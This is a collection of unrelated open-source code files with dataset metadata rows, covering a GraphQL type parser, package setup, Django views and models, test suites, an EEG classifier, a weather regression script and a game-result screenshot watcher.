            output['inputFields'] = None
        elif self.kind == GraphQLKind.INPUT_OBJECT:
            output['fields'] = None
            output['inputFields'] = [f.to_json() for f in self.fields]

        return output

    @classmethod
    def from_json(
        cls,
        _json: Dict[str, Any],
    ) -> 'Type':
        """Build a Type from an introspection node, skipping dummy fields."""
        name = _json['name']
        kind = _json['kind']
        fields = []
        if kind in [GraphQLKind.OBJECT, GraphQLKind.INTERFACE, GraphQLKind.INPUT_OBJECT]:
            fields_field = ''
            if kind in [GraphQLKind.OBJECT, GraphQLKind.INTERFACE]:
                fields_field = 'fields'
            elif kind == GraphQLKind.INPUT_OBJECT:
                fields_field = 'inputFields'
            for f in _json[fields_field]:
                # Don't add dummy fields!
                if f['name'] == 'dummy':
                    continue
                fields.append(Field.from_json(f))
        return cls(
            name=name,
            kind=kind,
            fields=fields,
        )
| nikitastupin/clairvoyance | clairvoyance/graphql.py | graphql.py | py | 12,718 | python | en | code | 785 | github-code | 36 |
36963468353 | import setuptools
# Read the long description from the README so PyPI can render it.
# Bug fix: pin the encoding — the locale default can fail or mis-decode
# on non-UTF-8 systems.
with open("README.md", encoding="utf-8") as fh:
    long_description = fh.read()

setuptools.setup(
    name="pysqueezebox",
    version="0.7.1",
    license="apache-2.0",
    author="Raj Laud",
    author_email="raj.laud@gmail.com",
    description="Asynchronous library to control Logitech Media Server",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/rajlaud/pysqueezebox",
    packages=setuptools.find_packages(),
    python_requires=">=3.6",
    install_requires=["aiohttp", "async-timeout"],
)
| rajlaud/pysqueezebox | setup.py | setup.py | py | 572 | python | en | code | 10 | github-code | 36 |
17796457144 | from __future__ import absolute_import, division, print_function, unicode_literals
import uuid
from contextlib import contextmanager
from pants.backend.codegen.thrift.java.java_thrift_library import JavaThriftLibrary
from pants.backend.codegen.thrift.java.thrift_defaults import ThriftDefaults
from pants.build_graph.target import Target
from pants_test.test_base import TestBase
class TestThriftDefaults(TestBase):
    """Unit tests for the ThriftDefaults subsystem (compiler/language options)."""

    def create_thrift_defaults(self, **options):
        # Register the subsystem with the given scoped options, then return
        # the freshly initialised global instance.
        self.context(for_subsystems=[ThriftDefaults], options={
            ThriftDefaults.options_scope: options
        })
        return ThriftDefaults.global_instance()

    @contextmanager
    def invalid_fixtures(self):
        """Yield (thrift_defaults, non-thrift target); the wrapped body is
        expected to raise ValueError."""
        target = self.make_target(spec='not_java_thift_library_{}'.format(uuid.uuid4()),
                                  target_type=Target)
        thrift_defaults = self.create_thrift_defaults()
        with self.assertRaises(ValueError):
            yield thrift_defaults, target

    def test_compiler_invalid(self):
        with self.invalid_fixtures() as (thrift_defaults, target):
            thrift_defaults.compiler(target)

    def test_language_invalid(self):
        with self.invalid_fixtures() as (thrift_defaults, target):
            thrift_defaults.language(target)

    def create_thrift_library(self, **kwargs):
        # Unique spec names avoid collisions across tests.
        return self.make_target(spec='java_thift_library_{}'.format(uuid.uuid4()),
                                target_type=JavaThriftLibrary,
                                **kwargs)

    def test_compiler(self):
        # Target-level compiler overrides the subsystem default.
        thrift_defaults = self.create_thrift_defaults(compiler='thrift')
        self.assertEqual('thrift', thrift_defaults.compiler(self.create_thrift_library()))
        self.assertEqual('scrooge',
                         thrift_defaults.compiler(self.create_thrift_library(compiler='scrooge')))

    def test_language(self):
        # Target-level language overrides the subsystem default.
        thrift_defaults = self.create_thrift_defaults(language='java')
        self.assertEqual('java', thrift_defaults.language(self.create_thrift_library()))
        self.assertEqual('scala',
                         thrift_defaults.language(self.create_thrift_library(language='scala')))
| fakeNetflix/twitter-repo-pants | tests/python/pants_test/backend/codegen/thrift/java/test_thrift_defaults.py | test_thrift_defaults.py | py | 2,046 | python | en | code | 0 | github-code | 36 |
36955645899 | import os
import helper, wiredtiger, wttest
from wtscenario import make_scenarios
# test_prefetch01.py
# Test basic functionality of the prefetch configuration.
class test_prefetch01(wttest.WiredTigerTestCase):
    """Test basic functionality of the prefetch configuration across
    connection availability/default and session override combinations."""
    new_dir = 'new.dir'

    # Connection-level availability of pre-fetching.
    conn_avail = [
        ('available', dict(available=True)),
        ('not-available', dict(available=False))
    ]
    # Connection-level default for new sessions.
    conn_default = [
        ('default-off', dict(default=True)),
        ('default-on', dict(default=False)),
    ]
    # Session-level override (or no session config at all).
    session_cfg = [
        ('no-config', dict(scenario='no-config', enabled=False, has_config=False)),
        ('enabled', dict(scenario='enabled', enabled=True, has_config=True)),
        ('not-enabled', dict(scenario='not-enabled', enabled=False, has_config=True)),
    ]
    scenarios = make_scenarios(conn_avail, conn_default, session_cfg)

    def test_prefetch_config(self):
        conn_cfg = 'prefetch=(available=%s,default=%s)' % (str(self.available).lower(), str(self.default).lower())
        session_cfg = ''
        msg = '/pre-fetching cannot be enabled/'
        if self.has_config:
            session_cfg = 'prefetch=(enabled=%s)' % (str(self.enabled).lower())
        # Work on a copy of the home directory so reopening is clean.
        os.mkdir(self.new_dir)
        helper.copy_wiredtiger_home(self, '.', self.new_dir)

        if not self.available and self.default:
            # Test that we can't enable a connection's sessions to have pre-fetching when
            # pre-fetching is configured as unavailable.
            self.assertRaisesWithMessage(wiredtiger.WiredTigerError,
                lambda: self.wiredtiger_open(self.new_dir, conn_cfg), msg)
        elif not self.available and self.enabled:
            # Test that we can't enable a specific session to have pre-fetching turned on
            # if pre-fetching is configured as unavailable.
            new_conn = self.wiredtiger_open(self.new_dir, conn_cfg)
            self.assertRaisesWithMessage(wiredtiger.WiredTigerError,
                lambda: new_conn.open_session(session_cfg), msg)
        else:
            # Every other combination is valid and must open cleanly.
            new_conn = self.wiredtiger_open(self.new_dir, conn_cfg)
            new_session = new_conn.open_session(session_cfg)
            self.assertEqual(new_session.close(), 0)
if __name__ == '__main__':
    # Allow running this test file directly.
    wttest.run()
| mongodb/mongo | src/third_party/wiredtiger/test/suite/test_prefetch01.py | test_prefetch01.py | py | 2,236 | python | en | code | 24,670 | github-code | 36 |
23195728404 | from django.http import HttpResponse
from django.shortcuts import render
from config import settings
#from email.message import EmailMessage
from django.core.mail import EmailMessage
# Create your views here.
def home(request):
    """Render the static landing page."""
    return render(request, "index.html")
def send_email(request):
    """Handle the contact form: e-mail the submitted message.

    Expects POST fields ``name``, ``email``, ``msg`` and ``phone`` and
    returns an Uzbek success/failure message as plain text.
    """
    if request.method == 'POST':
        name = request.POST['name']
        sender_email = request.POST['email']
        msg = request.POST['msg']
        phone = request.POST['phone']
        email = EmailMessage(
            f'Xabar qoldiruvchi: {sender_email}',
            f'Ismi: {name}\nXabari: {msg}\nTel raqami: {phone}',
            settings.EMAIL_HOST_USER,
            # NOTE(review): the message is sent back to the submitter;
            # confirm the site owner's address shouldn't be the recipient.
            [sender_email]
        )
        email.fail_silently = True
        # Bug fix: send() returns the number of messages delivered; with
        # fail_silently=True a failed send previously still reported success.
        if email.send():
            return HttpResponse("Muvaffaqiyatli jo'natildi")
        return HttpResponse("Jo'natilmadi")
    else:
        return HttpResponse("Jo'natilmadi")
5603935400 | from django.urls import path
from . import views
# Namespace used for reverse URL lookups ('base:home', ...).
app_name = 'base'

urlpatterns = [
    # Landing page.
    path('home/', views.landing_page, name='home'),
    # List of registered schools.
    path('school_registered/', views.school_list_page, name='school_registered'),
    # Contact form.
    path('contact_us/', views.contact_us_page, name='contact_us'),
]
| zuri-training/Project-My-Debtors-Team-38 | SDM/base/urls.py | urls.py | py | 293 | python | en | code | 2 | github-code | 36 |
4872107449 | import pyriemann
import mne
from mne.io import read_raw_gdf
import scipy
from scipy import signal
from scipy.signal import butter, filtfilt, sosfiltfilt
import os
import pickle
import sklearn
import seaborn as sns
import matplotlib
import matplotlib as mpl
mpl.use('Qt5Agg') # for using pyplot (pip install pyqt5)
import matplotlib.pyplot as plt
import numpy as np
# Bandpass filtering
def butter_lowpass_filter(data, lowcut, fs, order):
nyq = fs/2
low = lowcut/nyq
b, a = butter(order, low, btype='low')
# demean before filtering
meandat = np.mean(data, axis=1)
data = data - meandat[:, np.newaxis]
y = filtfilt(b, a, data) # zero-phase filter # data: [ch x time]
return y
def butter_highpass_filter(data, highcut, fs, order):
nyq = fs/2
high = highcut/nyq
b, a = butter(order, high, btype='high')
# demean before filtering
meandat = np.mean(data, axis=1)
data = data - meandat[:, np.newaxis]
y = filtfilt(b, a, data) # zero-phase filter # data: [ch x time]
return y
def butter_bandpass_filter(data, lowcut, highcut, fs, order):
nyq = fs/2
low = lowcut/nyq
high = highcut/nyq
sos = butter(order, [low, high], btype='band', output='sos')
# demean before filtering
meandat = np.mean(data, axis=1)
data = data - meandat[:, np.newaxis]
y = sosfiltfilt(sos, data) # zero-phase filter # data: [ch x time]
# specify pandlen to make the result the same as Matlab filtfilt()
return y
# User parameters
# 769, 770, 774, 780 - left, right, up (tongue), down (feet)
#markers = [769, 770, 780, 774]
#markers_arr = {769:0, 770:1, 780:2, 774:3}
markers = [769, 770]  # left, right
markers_arr = {769: 1, 770: 2}  # event code -> class label

# for g.tec EEG
nCh = 16
fs = 512
frame = [0.5, 3]  # epoch window in seconds, relative to cue onset
nTime = int((frame[1] - frame[0]) * 512)
#nTrial = 20
nClass = len(markers)
bp = [8, 30]  # mu/beta band-pass limits (Hz)
ch_names = ['FP1', 'FP2', 'F4', 'Fz', 'F3', 'T7', 'C3', 'Cz', 'C4', 'T8', 'P4', 'Pz', 'P3', 'O1', 'Oz', 'O2']
roi = ['F4', 'Fz', 'F3', 'C3', 'Cz', 'C4', 'P4', 'Pz', 'P3']
# Indices of the region-of-interest channels within ch_names.
roi_id = np.zeros((len(roi)), dtype=np.int64)
for i in range(len(roi)):
    roi_id[i] = ch_names.index(roi[i])  # use roi_id

nSub = 3
train_EEG = np.array([]).reshape(0, nCh, nTime)  # accumulated [trial x ch x time]
train_labels = []
for i in range(4):
    # One GDF recording per motor-imagery run.
    fname = './data/s%02d/MI_run%02d.gdf' % (nSub, (i + 1))
    print(fname)
    eeg = read_raw_gdf(fname)
    ano_types = eeg.annotations.description.astype(int)  # markers
    ano_latency = np.round(eeg.annotations.onset, 4)
    eeg_times = np.round(eeg.times, 4)
    dat = eeg.get_data() * 1000000  # volts -> microvolts
    ch_names = eeg.ch_names
    merge_EEG = np.array([]).reshape(nCh, nTime, 0)
    for cur_markers in markers:
        event_indicies = np.argwhere(ano_types == cur_markers)
        event_latencies = ano_latency[event_indicies]
        print('current marker is ' + str(cur_markers))
        n_trial = 0
        epoched_EEG = np.array([]).reshape(nCh, nTime, 0)
        tmp_labels = markers_arr[cur_markers] * np.ones((len(event_latencies)))
        train_labels = np.append(train_labels, tmp_labels)
        for cur_latency in event_latencies:
            # Sample index of the cue onset for this trial.
            m_onset = np.where(eeg_times == cur_latency)[0][0]
            tmp_epoch = dat[:, m_onset + int(frame[0] * fs):m_onset + int(frame[1] * fs)]
            # epoch-level bandpass filtering
            tmp_epoch = butter_bandpass_filter(tmp_epoch, bp[0], bp[1], fs, 4)
            epoched_EEG = np.dstack((epoched_EEG, tmp_epoch))
            n_trial = n_trial + 1
        merge_EEG = np.dstack((merge_EEG, epoched_EEG))
    merge_EEG = np.transpose(merge_EEG, (2, 0, 1))  # now [trial x ch x time]
    train_EEG = np.vstack((train_EEG, merge_EEG))

# Spatial covariance features over ROI channels, then Riemannian MDM.
cov_train = pyriemann.estimation.Covariances().fit_transform(train_EEG[:, roi_id, :])
print(cov_train.shape)
print(train_labels.shape)
mdm = pyriemann.classification.MDM()
mdm.metric = 'Riemann'
mdm.fit(cov_train, train_labels)  # training
mdm_train_acc = np.sum(mdm.predict(cov_train) == train_labels) / len(train_labels)  # train - meaningless
print('training accuracy is', np.round(mdm_train_acc, 4))

# Persist covariances + labels for later (online) use.
trained = {'COV': cov_train, 'Labels': train_labels}
fname_user = input('Enter model name: ')
fname_model = './data/s%02d/%s.pkl' % (nSub, fname_user)
print(fname_model, 'saved.')
out_file = open(fname_model, 'wb')
pickle.dump(trained, out_file)
out_file.close()
| Kyungho-Won/PyRiemann-with-OpenViBE | train_MI_Riemann.py | train_MI_Riemann.py | py | 4,441 | python | en | code | 0 | github-code | 36 |
7789477007 | #1st example
'''class Base:
def Fun():
print("Hello World")
class Derive(Base):
def AnotherFun():
print("Bye World")
obj=Derive()
obj.Fun()
obj.AnotherFun()'''
#2nd example
#-----------------------------------
class Bank:
    """Simple bank-account record with console input/output."""

    # Class-level defaults for a new account.
    acno = 0
    name = ''
    branch = ''
    balance = 0.0

    def Input(self):
        """Read account details from the console.

        Bug fix: values are stored on ``self`` — previously they were
        assigned to local variables and silently discarded, so Output()
        always printed the class defaults.
        """
        self.acno = int(input("Enter Account Number"))
        self.name = input("Enter your name")
        self.branch = input("Enter your Branch Name")
        self.balance = float(input("Enter your Bank Balance"))

    def Output(self):
        """Print the stored account details."""
        print("Account Number : ", self.acno)
        print("Name : ", self.name)
        print("Branch : ", self.branch)
        print("Bank Balance : ", self.balance)

    def Fun(self):
        print("test")
class BankV1(Bank):
    """Bank account extended with an Aadhaar number (overriding demo)."""
    # Default Aadhaar value for a new account.
    aadhar = 0

    def Input(self):  # Overriding
        # Reuse the base-class input, then read the extra field.
        Bank.Input(self)
        self.aadhar = input("Enter Aadhar Number : ")

    def Output(self):
        Bank.Output(self)  # Overriding
        print("Your Aadhar Number is : ", self.aadhar)
# Demo: read account details from the console, then print them back.
c = BankV1()
c.Input()
c.Output()
| diamondzxd/Python-classes | 07th session/1.py | 1.py | py | 1,099 | python | en | code | 0 | github-code | 36 |
35387023504 | #!/usr/bin/env python3
import os
from sys import argv, exit
from pathlib import Path
import vertex_cover_lib as vcl
EXACT_LIMIT = 80
def main(num_vertices, num_edges, seed, weighted, approx, file_full_extension):
    """Generate one (possibly weighted) random graph instance, compute its
    vertex cover exactly or approximately, and print it in the format
    selected by ``file_full_extension``.
    """
    # Automatic cast: all CLI arguments arrive as strings.
    num_vertices = int(num_vertices)
    num_edges = int(num_edges)
    seed = int(seed)
    weighted = int(weighted)
    approx = int(approx)

    # Generate graph instance
    instance = vcl.instances_generator(1, 1, num_vertices, num_edges, seed, weighted)[0]

    #if num_vertices <= EXACT_LIMIT:
    if not approx:
        # Exact minimum vertex cover (optionally weighted).
        if not weighted:
            size, sol = vcl.calculate_minimum_vc(instance['graph'])
        else:
            sol, size, weight = vcl.calculate_minimum_weight_vc(instance['graph'])
            instance['risp_weight'] = weight
        instance['exact_sol'] = True
        instance['risp'] = sol
    else:
        # Approximation algorithms (matching-based for the unweighted case).
        if not weighted:
            size, sol, max_matching = vcl.calculate_approx_vc(instance['graph'])
            instance['exact_sol'] = False
            instance['risp'] = f'{sol}\n{max_matching}'
            #instance['risp'] = max_matching
        else:
            sol, size, weight = vcl.calculate_weighted_approx_vc(instance['graph'])
            instance['exact_sol'] = False
            instance['risp'] = sol
            instance['risp_weight'] = weight

    # Generate selected output
    print(vcl.instance_to_str(instance, vcl.file_extension_to_format_name(file_full_extension)))
if __name__ == "__main__":
from sys import argv
#assert len(argv) == 5, 'Miss arguments'
main(argv[1], argv[2], argv[3], argv[4], argv[5], argv[6])
exit(0)
| romeorizzi/TALight | example_problems/tutorial/vertex_cover/gen/randgen_1_basic.py | randgen_1_basic.py | py | 1,595 | python | en | code | 11 | github-code | 36 |
34301681133 |
import matplotlib
matplotlib.use('TKAgg')
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
from dateutil import parser
import numpy as np
import pandas as pd
import datetime
df_ferrara = pd.read_csv('WeatherData/ferrara_270615.csv')
df_milano = pd.read_csv('WeatherData/milano_270615.csv')
df_mantova = pd.read_csv('WeatherData/mantova_270615.csv')
df_ravenna = pd.read_csv('WeatherData/ravenna_270615.csv')
df_torino = pd.read_csv('WeatherData/torino_270615.csv')
df_asti = pd.read_csv('WeatherData/asti_270615.csv')
df_bologna = pd.read_csv('WeatherData/bologna_270615.csv')
df_piacenza = pd.read_csv('WeatherData/piacenza_270615.csv')
df_cesena = pd.read_csv('WeatherData/cesena_270615.csv')
df_faenza = pd.read_csv('WeatherData/faenza_270615.csv')
# dist 是一个装城市距离海边距离的列表
dist = [df_ravenna['dist'][0],
df_cesena['dist'][0],
df_faenza['dist'][0],
df_ferrara['dist'][0],
df_bologna['dist'][0],
df_mantova['dist'][0],
df_piacenza['dist'][0],
df_milano['dist'][0],
df_asti['dist'][0],
df_torino['dist'][0]
]
# temp_max 是一个存放每个城市最高温度的列表
temp_max = [df_ravenna['temp'].max(),
df_cesena['temp'].max(),
df_faenza['temp'].max(),
df_ferrara['temp'].max(),
df_bologna['temp'].max(),
df_mantova['temp'].max(),
df_piacenza['temp'].max(),
df_milano['temp'].max(),
df_asti['temp'].max(),
df_torino['temp'].max()
]
# temp_min 是一个存放每个城市最低温度的列表
temp_min = [df_ravenna['temp'].min(),
df_cesena['temp'].min(),
df_faenza['temp'].min(),
df_ferrara['temp'].min(),
df_bologna['temp'].min(),
df_mantova['temp'].min(),
df_piacenza['temp'].min(),
df_milano['temp'].min(),
df_asti['temp'].min(),
df_torino['temp'].min()
]
# 调用 subplots() 函数,重新定义 fig, ax 变量
fig, ax = plt.subplots()
plt.xticks(rotation=70)
hours = mdates.DateFormatter('%H:%M')
ax.xaxis.set_major_formatter(hours)
# 先把最高温画出来。
fig, ax = plt.subplots()
ax.plot(dist,temp_max,'ro')
# 用线性回归算法得到两条直线,分别表示两种不同的气温趋势,这样做很有趣。我们可以使用scikit-learn库的SVR方法。
from sklearn.svm import SVR
# dist1是靠近海的城市集合,dist2是远离海洋的城市集合
dist1 = dist[0:5]
dist2 = dist[5:10]
# 改变列表的结构,dist1现在是5个列表的集合
# 之后我们会看到 numpy 中 reshape() 函数也有同样的作用
dist1 = [[x] for x in dist1]
dist2 = [[x] for x in dist2]
# temp_max1 是 dist1 中城市的对应最高温度
temp_max1 = temp_max[0:5]
# temp_max2 是 dist2 中城市的对应最高温度
temp_max2 = temp_max[5:10]
# 我们调用SVR函数,在参数中规定了使用线性的拟合函数
# 并且把 C 设为1000来尽量拟合数据(因为不需要精确预测不用担心过拟合)
svr_lin1 = SVR(kernel='linear', C=1e3)
svr_lin2 = SVR(kernel='linear', C=1e3)
# 加入数据,进行拟合(这一步可能会跑很久,大概10多分钟,休息一下:) )
svr_lin1.fit(dist1, temp_max1)
svr_lin2.fit(dist2, temp_max2)
# 关于 reshape 函数请看代码后面的详细讨论
xp1 = np.arange(10,100,10).reshape((9,1))
xp2 = np.arange(50,400,50).reshape((7,1))
yp1 = svr_lin1.predict(xp1)
yp2 = svr_lin2.predict(xp2)
# ax = fig.add_subplot(122)
# 限制了 x 轴的取值范围
ax.set_xlim(0,400)
# 画出图像
ax.plot(xp1, yp1, c='b', label='Strong sea effect')
ax.plot(xp2, yp2, c='g', label='Light sea effect')
print(svr_lin1.coef_) #斜率
print(svr_lin1.intercept_) # 截距
print(svr_lin2.coef_)
print(svr_lin2.intercept_)
# 你可能会考虑将这两条直线的交点作为受海洋影响和不受海洋影响的区域的分界点,或者至少是海洋影响较弱的分界点。
from scipy.optimize import fsolve
def line1(x):
    """Evaluate the first fitted regression line (near-sea trend) at x."""
    slope = svr_lin1.coef_[0][0]
    intercept = svr_lin1.intercept_[0]
    return slope * x + intercept
def line2(x):
    """Evaluate the second fitted regression line (inland trend) at x."""
    slope = svr_lin2.coef_[0][0]
    intercept = svr_lin2.intercept_[0]
    return slope * x + intercept
def findIntersection(fun1, fun2, x0):
    """Return the x coordinate where fun1(x) == fun2(x).

    Solves fun1(x) - fun2(x) = 0 numerically with scipy's fsolve,
    starting the search from x0.  Returns an ndarray of roots.
    """
    difference = lambda x: fun1(x) - fun2(x)
    return fsolve(difference, x0)
# Intersection of the two trend lines: a rough boundary between the
# sea-influenced region and the (weakly influenced) inland region.
result = findIntersection(line1,line2,0.0)
print("[x,y] = [ %d , %d ]" % (result,line1(result)))
# Mark the intersection with a yellow square and show the figure.
ax.plot(result, line1(result), 'ys')
fig.show()
| eternity-phoenix/Private | 气象数据分析/气象线性分析.py | 气象线性分析.py | py | 4,432 | python | zh | code | 0 | github-code | 36 |
6790838721 | from django.db import models
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes.fields import GenericRelation
from model_utils.models import TimeStampedModel
from files.mixins import UploadedFileMixin
from permissions.models import PermissionManagerMixin
from utils.models import CreatedByMixin
from utils.models.slug_field import AutoSlugCustomManagerField
from utils.descriptors import ChoicesDescriptorMixin
from ..managers.post import PostManager, AllPostManager
from ..conf import settings
from .mails.mails import PostEmailMixin
from .mixins import PostStatsMixin, PostPermissionsMixin, PostMetricMixin
class Post(
        PostPermissionsMixin,
        PostMetricMixin,
        PostStatsMixin,
        UploadedFileMixin,
        PermissionManagerMixin,
        CreatedByMixin,
        ChoicesDescriptorMixin,
        PostEmailMixin,
        TimeStampedModel):
    """Forum post attached (via a generic FK) to a circle, project team or
    Q&A session.  Mixins supply permissions, metrics, e-mail notifications
    and audit fields."""
    # Define here because of AutoSlugField
    # (AutoSlugCustomManagerField consults the managers during field setup,
    # so they must exist before `slug` is declared; they are re-declared
    # again after the fields below.)
    objects = PostManager()
    all_objects = AllPostManager()
    title = models.CharField(max_length=255)
    description = models.TextField()
    # Generic relation to the container the post belongs to
    # (circle / project team / Q&A session announcement, see `_type`).
    content_type = models.ForeignKey(
        ContentType,
        on_delete=models.CASCADE,
        null=True,
    )
    object_id = models.PositiveIntegerField(null=True)
    content_object = GenericForeignKey('content_type', 'object_id')
    # URL slug generated from the title; unique across all posts.
    slug = AutoSlugCustomManagerField(
        populate_from='title',
        unique=True,
        null=True,
        blank=False,
    )
    tags = models.ManyToManyField('keywords.Keyword')
    # Single-character coded enums; ChoicesDescriptorMixin exposes them as
    # boolean properties (is_circle, is_project, is_q_a_session, ...).
    _type = models.CharField(
        max_length=1,
        choices=settings.FORUM_POST_CH_TYPE)
    status = models.CharField(
        max_length=1,
        choices=settings.FORUM_CH_POST_STATUS,
        default=settings.FORUM_CH_POST_STATUS_DEFAULT)
    CHOICES_DESCRIPTOR_FIELDS = [
        '_type',
        'status',
    ]
    CHOICES_DESCRIPTOR_FIELDS_CHOICES = [
        settings.FORUM_POST_CH_TYPE,
        settings.FORUM_CH_POST_STATUS,
    ]
    # Status-change audit trail and attached files.
    logs = GenericRelation('PostAnswerStatus')
    files = GenericRelation('files.UploadedFile')
    objects = PostManager()
    all_objects = AllPostManager()
    slug_manager = AllPostManager()
    class Meta:
        verbose_name = 'Post'
        verbose_name_plural = 'Posts'
        ordering = ['-modified']
        base_manager_name = 'objects'
        permissions = settings.FORUM_PERMS_POST_ALL_PERMISSIONS
    def __str__(self):
        return self.title
    @property
    def category_name(self):
        """Human-readable category label derived from the post type/target."""
        category_name = ''
        if self.is_q_a_session:
            category_name = '{} - {} - {}'.format(
                self.get__type_display(),
                self.content_object.team.project,
                self.content_object.session.name,
            )
        elif self.content_object:
            category_name = self.content_object.name
        else:
            category_name = self.get__type_display()
        return category_name
    @property
    def circle(self):
        # The related circle, or None when the post is not a circle post.
        if self.is_circle:
            return self.content_object
        return None
    @property
    def qa_session(self):
        # The related Q&A session, or None for other post types.
        if self.is_q_a_session:
            return self.content_object.session
        return None
    @property
    def team(self):
        # Owning team: direct for project posts, via the session for Q&A posts.
        if self.is_project:
            return self.content_object
        elif self.is_q_a_session:
            return self.content_object.team
        return None
    @property
    def project(self):
        if self.team:
            return self.team.project
        return None
    @property
    def created_by_role(self):
        return self.created_by.user_title
    @property
    def url(self):
        """Frontend detail-page URL; empty string for unsupported types."""
        if self.is_circle or self.is_project or self.is_announcement:
            if self.is_circle:
                circle = self.circle.slug
            elif self.is_project:
                circle = 'participant-questions'
            else:
                circle = 'announcements'
            return settings.FRONTEND_POST_DETAIL_PAGE.format(
                slug=self.slug,
                circle=circle)
        elif self.is_q_a_session:
            return settings.FRONTEND_JOBS_SWARM_SESSION_QUESTION_PAGE.format(
                **{
                    'pk_qa_session': self.content_object.session.pk,
                    'pk': self.pk
                })
        else:
            return ''
    @property
    def url_project(self):
        """Project-scoped frontend URL; empty string when there is no project."""
        kwargs = {}
        if self.project is not None:
            kwargs = {
                'project_id': self.project.pk,
                'team_id': self.team.pk,
                'pk': self.pk,
            }
            if self.is_project:
                kwargs['section'] = 'ask-ecosystem'
            elif self.is_q_a_session:
                kwargs['section'] = 'swarm-session'
        else:
            kwargs = None
        if kwargs is not None:
            return settings.FRONTEND_PROJECT_QUESTION_PAGE.format(**kwargs)
        return ''
    def set_status(self, user_from, new_status):
        """Record the current status in the audit log, then switch to new_status."""
        self.logs.create(
            user=user_from, status=self.status)
        self.status = new_status
        self.save(update_fields=['modified', 'status'])
    def mark_as_removed(self, user_from):
        """Soft-delete the post (permission-checked) and fire the removal hook."""
        self.can_update_or_remove(user_from)
        self.set_status(user_from, settings.FORUM_CH_REMOVED)
        self.action_removed(user_from)
    def reply(self, user_from, comment, timestamp=None, **kwargs):
        """Create an answer on this post.

        Optionally backdates the answer (and the post's `modified`) to
        `timestamp`.  Sends an e-mail notification unless
        kwargs['email_notification'] is False, marks the answer as seen by
        its author, then delegates to the mixin chain via super().
        """
        self.can_reply(user_from)
        answer = self.answers.create(
            comment=comment,
            created_by=user_from,
            reply_to=kwargs.get('reply_to'),
        )
        kwargs['target_object'] = answer
        if timestamp:
            # Backdate via queryset update to bypass auto_now on `modified`.
            self.answers.filter(pk=answer.pk).update(
                created=timestamp,
                modified=timestamp)
            Post.objects.filter(pk=self.pk).update(modified=timestamp)
        else:
            self.save(update_fields=['modified'])
        if kwargs.get('email_notification', True):
            self.send_email_reply(answer)
        answer.see(user_from)
        super().reply(user_from, comment, timestamp, **kwargs)
        return answer
| tomasgarzon/exo-services | service-exo-core/forum/models/post.py | post.py | py | 6,189 | python | en | code | 0 | github-code | 36 |
23563814386 | import keyboard
import time
import PySimpleGUI as sg
from threading import Thread,Event
from queue import Queue
from os.path import join,exists,pardir
import webbrowser
import logging
from urllib import request
from urllib.parse import quote
from setting import Setting
setting = Setting()
# Verbose logging only in maintainer ("manage") mode; warnings otherwise.
if setting.manage:
    logging_level = logging.DEBUG
else:
    logging_level = logging.WARNING
# Log to log.txt, truncated on every start.
logging.basicConfig(
    level=logging_level,
    filename='log.txt',
    filemode='w',
    format='%(asctime)s - %(name)s %(levelname)-7s %(message)s'
)
logger = logging.getLogger()
logger.debug('loaded main.py')
logger.debug('mode: manage')
from version import version
import gui.main as gui
from gui.setting import open_setting
from gui.export import open_export
from gui.general import get_imagevalue
from define import define
from resources import resource,play_sound_result,check_latest
from screenshot import Screenshot,open_screenimage
from recog import recog
from raw_image import save_raw
from storage import StorageAccessor
from record import NotebookRecent,NotebookMusic,rename_allfiles
from graph import create_graphimage,save_graphimage
from result import result_save,result_savefiltered,get_resultimage,get_filteredimage
from filter import filter as filter_result
from playdata import Recent
from windows import find_window,get_rect,openfolder_results,openfolder_filtereds,openfolder_graphs
# Maximum number of rows kept in the "recent results" table.
recent_maxcount = 100
# Watcher-thread polling intervals, in seconds.
thread_time_wait_nonactive = 1
thread_time_wait_loading = 30
thread_time_normal = 0.3
thread_time_result = 0.12
# User-facing confirmation text (Japanese) shown before uploading a
# misrecognized-title report; runtime strings, kept verbatim.
upload_confirm_message = [
    '曲名の誤認識を通報しますか?',
    'リザルトから曲名を切り取った画像をクラウドにアップロードします。'
]
# Identifiers of the game window/process to watch.
windowtitle = 'beatmania IIDX INFINITAS'
exename = 'bm2dx.exe'
# External URLs: release page and tweet intent endpoint.
latest_url = 'https://github.com/kaktuswald/inf-notebook/releases/latest'
tweet_url = 'https://twitter.com/intent/tweet'
# Tweet templates; &&...&& placeholders are substituted in tweet().
tweet_template_music = '&&music&&[&&play_mode&&&&D&&]&&update&&&&option&&'
tweet_template_hashtag = '#IIDX #infinitas573 #infnotebook'
class ThreadMain(Thread):
    """Background watcher thread.

    Polls for the INFINITAS window, screenshots it while active, detects
    the current screen, and pushes confirmed result screens to the main
    loop through the supplied queues.
    """
    handle = 0                  # window handle; 0 while the window is not found
    active = False              # window found at the expected resolution
    waiting = False             # currently in the long post-"loading" wait
    confirmed_result = False    # result screen observed at least once
    confirmed_savable = False   # savable state observed; debounce started
    processed_result = False    # this result already pushed to the queue
    screen_latest = None        # last screen name (tracks transitions)

    def __init__(self, event_close, queues):
        """Store the stop event and queues, then start immediately.

        Args:
            event_close (Event): set by the main loop to stop this thread.
            queues (dict): 'log', 'display_image', 'result_screen' queues.
        """
        self.event_close = event_close
        self.queues = queues
        Thread.__init__(self)
        self.start()

    def run(self):
        self.sleep_time = thread_time_wait_nonactive
        self.queues['log'].put('start thread')
        # Event.wait doubles as the polling interval; True means "closing".
        while not self.event_close.wait(timeout=self.sleep_time):
            self.routine()

    def routine(self):
        """One polling step: locate the window, classify the screen, emit results."""
        if self.handle == 0:
            self.handle = find_window(windowtitle, exename)
            if self.handle == 0:
                return
            self.queues['log'].put('infinitas find')
            self.active = False
            screenshot.xy = None
        rect = get_rect(self.handle)
        # Bug fix: rect was dereferenced (rect.right etc.) *before* the
        # "rect is None" check below, which made that check unreachable and
        # raised AttributeError instead.  Guard the dereference first.
        if rect is not None:
            width = rect.right - rect.left
            height = rect.bottom - rect.top
        if rect is None or not width or not height:
            # Window vanished or degenerate rect: forget it and slow down.
            self.queues['log'].put('infinitas lost')
            self.sleep_time = thread_time_wait_nonactive
            self.handle = 0
            self.active = False
            screenshot.xy = None
            return
        if width != define.width or height != define.height:
            # Wrong resolution (e.g. minimized): treat as inactive.
            if self.active:
                self.queues['log'].put('infinitas deactivate')
                self.sleep_time = thread_time_wait_nonactive
                self.active = False
                screenshot.xy = None
            return
        if not self.active:
            self.active = True
            self.waiting = False
            self.queues['log'].put('infinitas activate')
            self.sleep_time = thread_time_normal
